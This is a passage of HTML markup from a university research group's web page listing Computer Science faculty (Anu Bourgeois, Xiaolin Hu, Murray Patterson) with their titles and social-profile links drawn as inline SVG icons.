       <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c40-outer\">\n            <div data-colibri-id=\"182-c40\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c40 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c41\" class=\"d-block style-973 style-local-182-c41 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg\" class=\"wp-image-1348 style-973-image style-local-182-c41-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c41-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c42\" class=\"h-global-transition-all h-heading style-974 style-local-182-c42 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c42\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Xiaolin Hu</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c43\" class=\"h-text h-text-component style-975 style-local-182-c43 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c44\" class=\"h-text h-text-component style-976 style-local-182-c44 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c45\" class=\"style-977 style-local-182-c45 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://csds.gsu.edu/profile/xiaolin-hu/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=zeU19nAAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c46-outer\">\n            <div data-colibri-id=\"182-c46\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c46 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c47\" class=\"d-block style-973 style-local-182-c47 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-patterson.jpg\" class=\"wp-image-1391 style-973-image style-local-182-c47-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c47-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c48\" class=\"h-global-transition-all h-heading style-974 style-local-182-c48 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c48\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Murray Patterson</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c49\" class=\"h-text h-text-component style-975 style-local-182-c49 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Assistant Professor&nbsp;</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c50\" class=\"h-text h-text-component style-976 style-local-182-c50 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c51\" class=\"style-977 style-local-182-c51 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/murray-patterson-449a947\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/murray-patterson/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=X4J8vAEAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 